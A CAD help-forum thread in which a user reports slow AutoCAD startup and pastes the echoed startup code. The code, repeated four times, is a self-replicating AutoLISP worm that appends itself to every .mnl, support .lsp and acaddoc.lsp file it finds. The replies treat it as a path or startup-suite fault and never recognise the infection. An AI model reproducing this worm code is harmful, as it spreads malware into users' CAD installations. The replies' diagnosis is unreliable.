advanced rendering for AutoCAD
AutoCad always now have to go throught this to startup and so take ages to open a new or existing drawing. What is wrong and how can I correct it?
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
bad argument type: streamp nil
Autodesk DWG. This file is a TrustedDWG last saved by an Autodesk application
or Autodesk licensed application.
This is happening on all AutoCad (2007, 2012 & 2013) versions on my Laptop
This is not an nXt problem-- so I'm probably going to remove this discussion soon. I'll give people a chance to answer. Something's gone wrong with your startup file. Just scanning this code, it's likely a problem with visual lisp. Try removing it from your startup suite using appload.
I know it has nothing to do with nxt, just that the response time here is almost immediately and there is a wealth of experience user know avaliable here.
I take this to Autodesk forum and I might not live long enough to get response not to talk of a resolution of the problem.
The visual lisp causing the problem is what I cannot pin down. Removed all non AutoCad lisp from my StartUp Suite and I am still having the problem. Unless there is another way apart from via appload dialog box.
Any other suggestion is welcomed. Thanks in Advance.
Solution not working for me, uninstalling and re-stalling problem still persist.
Generally slow startups are caused by a missing path or file. Carefully search through your Options and verify every path. Then check your PlotStyles folder, there are shortcuts in there that if the file does not exist it will slow down start up. Lastly verify all files in your StartUp suite, once again, make sure they exist. Uninstalling and re-stalling does not always work, most of these setting are stored in your registry. You need to uninstall, clean out the registry (BIG WARNING!!! KNOW WHAT YOU ARE DOING IF YOU GO DOWN THIS ROUTE) then reinstall.